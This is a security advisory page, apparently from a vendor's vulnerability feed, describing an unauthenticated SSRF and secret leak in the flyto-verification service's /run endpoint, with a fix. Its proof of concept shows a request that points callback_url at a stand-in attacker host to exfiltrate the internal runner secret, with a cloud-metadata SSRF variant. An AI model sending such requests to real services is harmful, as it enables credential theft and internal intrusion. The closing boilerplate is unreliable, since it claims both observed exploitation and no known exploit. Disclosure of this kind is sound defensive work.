Know every vulnerabilitybefore it knows you.
DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.
GHSA-jx74-cqjv-2c67
No affected components available
Summary
The standalone flyto-verification service exposes POST /run with no authentication, on all interfaces (0.0.0.0:8344 per the shipped Dockerfile). The request body's callback_url is used verbatim for an outbound POST that unconditionally attaches X-Internal-Key: $FLYTO_RUNNER_SECRET. The callback_url bypasses the service's target_allowed allowlist (which only inspects params.target_url) and is never passed through any SSRF guard. This yields (a) unauthenticated SSRF to internal/metadata endpoints with an attacker-controlled JSON body, and (b) exfiltration of the internal runner secret to an attacker-controlled host — allowing forged authenticated callbacks to the real engine.
Root Cause
src/core/verification_service.py:363-364—/runhas noDepends/auth dependency.resolve_callback_urlreturns the clientcallback_urlverbatim (:315-316).post_callbackattachesX-Internal-Key: $FLYTO_RUNNER_SECRETwhenever the env var is set (:327-335).target_allowedonly gatesparams.target_url(:259), nevercallback_url. Novalidate_url_*anywhere in the file.Dockerfile.verificationCMD =main('0.0.0.0', 8344); entrypointflyto-verificationinpyproject.toml:107→ the shipped image binds all interfaces by default.
Impact
Unauthenticated (PR:N) readable SSRF to internal/cloud-metadata with a controlled body (C:H, S:C), plus theft of FLYTO_RUNNER_SECRET to an attacker host → the attacker can then authenticate to the real engine callback endpoint (credential compromise, CWE-522).
Proof of Concept
Code-proven this session (all lines confirmed on v2.26.6):
POST http://<verification-host>:8344/run
{"workflowYaml":"...","params":{...},"callback_url":"http://attacker.tld/collect"}
# -> service POSTs to attacker.tld with header X-Internal-Key: <FLYTO_RUNNER_SECRET>
# Or callback_url=http://<cloud-metadata-ip>/... for internal SSRF with a controlled body.
Attack Chain
- Entry: unauthenticated
POST http://<host>:8344/runwithcallback_url:"http://attacker.tld/collect". Guard: auth on/run. Bypass proof: noDepends(require_auth)(verification_service.py:363-364); Dockerfile binds all interfaces on port 8344. - Check:
target_allowedscope (:259). Bypass proof: only inspectsparams.target_url;callback_urlis never passed throughextract_host/target_allowed. - Check: SSRF validation on
callback_url. Bypass proof: file has ZEROvalidate_urlreferences. - Sink:
post_callback→session.post(callback_url, json=payload, headers={"X-Internal-Key": FLYTO_RUNNER_SECRET})(:330-335); header attached unconditionally when the env var is set (:327-329). - Impact: (a) SSRF to the cloud metadata IP / internal with a controlled JSON body; (b) exfiltration of FLYTO_RUNNER_SECRET → replay to authenticate to the real engine callback endpoint.
Bypass Evidence
/run has no auth dependency (grep-confirmed); resolve_callback_url returns the client value verbatim; X-Internal-Key attached unconditionally; target_allowed gates only params.target_url; no validate_url_* in the file; shipped Dockerfile binds all interfaces.
Affected Versions
<= 2.26.6 — verification_service.py, pyproject.toml:107 entrypoint, and Dockerfile.verification present on latest release tag.
Suggested Fix
Add authentication to /run; run callback_url through the SSRF guard + host allowlist before attaching any internal header; do not attach X-Internal-Key to non-allowlisted destinations; bind the service to loopback by default.
Credit
Vulnerability discovered by zx (Jace).
The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The vulnerability can affect other systems as well, not just the initial system. There is a high impact on the confidentiality of the information. There is a low impact on the integrity of the data.
Exploitation activity has been observed. Apply available patches or mitigations urgently.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
Browse More
Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.
Checkout DevGuard